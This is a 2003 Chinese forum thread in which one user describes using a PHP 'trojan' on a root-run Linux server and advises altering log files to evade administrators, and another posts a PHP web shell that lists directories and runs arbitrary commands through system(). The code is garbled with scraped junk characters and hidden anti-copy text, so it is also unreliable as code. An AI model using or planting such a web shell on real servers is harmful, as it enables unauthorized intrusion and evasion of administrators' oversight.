我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 # ?0 h. z( a4 H/ F" o6 N- G5 N: j6 x. Axx.php如下（太简陋了，不免高手门笑话，hoho） * C' q+ s3 R. s" G% F& W, i; K* W: [/ v$ m5 s//获得指定文件的文本 " x1 I) k7 a0 V0 w" Afunction getfile($filename) ) a( q4 C% P' N0 T6 H{ 0 k+ M) |4 y. D a# S, A if (!$filename){ return false; & U, c+ o9 z( ~) V- L* J } 9 Y9 M s/ M* H1 ^- c( n' h $fp = @fopen($filename,"r"); if (!$fp){ return false; } 6 A" _* W% S1 i0 J; t0 {0 o $fdata = @fread($fp,filesize($filename)); fclose($fp); 5 U1 v; ~% H) L return $fdata; 1 S" x, r8 h/ D& [% Y+ Z} 9 o+ @$ C% @" \$str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 1 T4 o; C+ o, K/ ?. Y9 U但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 ) F/ y( r/ |8 M$ i& [/* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ # q* U. ~! _$ i) |- k3 [/* 2 b# l" x* q/ I9 J& a; d( z, o8 _( w! W原作者： Martin Geisler 7 F/ F* l" {2 z2 `7 H改写汉化： YZHLINUX */ * P( I7 n$ w, U3 c* b% d! g0 J* ` ( K# n& A7 \4 k; w 0 P4 K+ N9 S! g+ y- H/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ if (isset($work_dir)) { /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 & ]8 X1 ?* D2 t0 D2 N3 V' b} else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 . I b0 N! T* c9 K Q0 o 注: $DOCUMENT_ROOT 是系统提供的*/ chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; } " \+ Z' z% |6 f; O5 H$ J?> ' r( l" P9 u; }6 }5 F K V; p" g1 M5 t0 Q. I+ _3 h

, }6 N3 p+ f2 g: A8 x

当前工作目录: , I1 p, C/ h; q* W9 r $work_dir_splitted = explode("/", substr($work_dir, 1)); 8 N) M+ D2 d9 l- q/ Decho "Root/"; if ($work_dir_splitted[0] == "") { $work_dir = "/"; /* 根目录. */ ; Y: `; p( |, `3 p3 |} else { # s$ W8 `* v2 h for ($i = 0; $i < count($work_dir_splitted); $i++) { /* echo "i = $i";*/ # @. Q" h) B: [! s& q0 H% d7 l $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } } ?>

* h* ?1 r5 U: C3 b8 `

选择新的工作目录:

. ^4 g, s7 m/ n/ E ( W$ G) `/ _6 | ^$ m, b8 E /* 现在我们对这个目录坐一个文件列表 */ ; c2 h* L: _! D( e, g! ^0 H& f7 U2 u$dir_handle = opendir($work_dir); ! W* m0 c" A% u. F! p8 s/* 来一个遍历找出所有的文件和目录 */ while ($dir = readdir($dir_handle)) { if (is_dir($dir)) { if ($dir == ".") { . E& x" u- Y l/ |8 j# X$ e! b( L echo "Current Directory\n"; * X% G' c" z3 J/ |" V; H2 z } elseif ($dir == "..") { ' `$ J, h, g1 T! i& n /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ 0 J8 B6 o" q2 S if (strlen($work_dir) == 1) { * O" Y$ J' O/ G7 e6 a7 I8 U /* 长度只有 1 ---- 那么只能是 '/' 了 */ } elseif (strrpos($work_dir, "/") == 0) { & x1 n9 Q/ j% H, L: f /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ - x) R, h/ a! I3 z3 \ echo "Parent Directory\n"; } else { # u5 g8 N1 N/ | E" h! j echo "Parent Directory\n"; } * Z6 ?" u; }2 R* { K' K( q } else { 6 u W2 R& w8 ?. X9 N3 w if ($work_dir == "/") { " l( w; {& a* J& U; V2 g! i. l echo "$dir\n"; " I3 E& ]0 X* R5 f- Z, { } else { echo "$dir\n"; } } } 4 r' y1 T& d- J$ W6 d T% o/ }: M} closedir($dir_handle);//不要忘记关闭 ?>

命令:

6 o9 E0 u0 O) W; Z; v: n >

I v; Q1 h) V" e2 a

是否捕获错误信息?

' O5 H3 c4 a3 Y* {

Output:

0 y2 ] P! Q- q- }4 V+ a<span style="display:none">; k3 {9 ?% K# S U/ ~</span><?php <span style="display:none">, Y& M. G6 U- p$ U: |</span>if ($command) {<font class="jammer">( o1 T# z$ q: Q6 I5 Z/ ~) w</font> if ($stderr) {<font class="jammer">$ o5 m% i+ J7 w$ W</font> /* 这个命令组能看懂吗? <font class="jammer">5 A8 E/ w0 J3 Y: m</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/ <span style="display:none"> _0 `3 w# [+ z9 Y* _6 E# |</span> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");<font class="jammer">- p2 R5 o- ~( F' Z F. m</font> }else {<font class="jammer">( J) r# k* |/ t% u</font> system($command); <span style="display:none">2 h: j2 r; v. U @, E9 e: I</span> } <span style="display:none"># o. c' t0 [9 x7 X4 Q' Y& w</span>} <span style="display:none">! G5 [, D" d4 d& z</span>?><font class="jammer">8 [6 B9 g' H3 @2 i$ ~</font> 7 v7 v7 T/ I6 I1 W1 y

: C8 f; N& A/ F! c7 U( S( N " F* u( \( @2 ?7 N$ F' f. U1 c2 b1 Y

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
1 v& U' `! J% Z我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
, J  _8 B, K, T- ?4 ~% y是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

( I; |( u0 a* f& m! C3 K我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
/ C7 K- m! G1 v) W: z想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵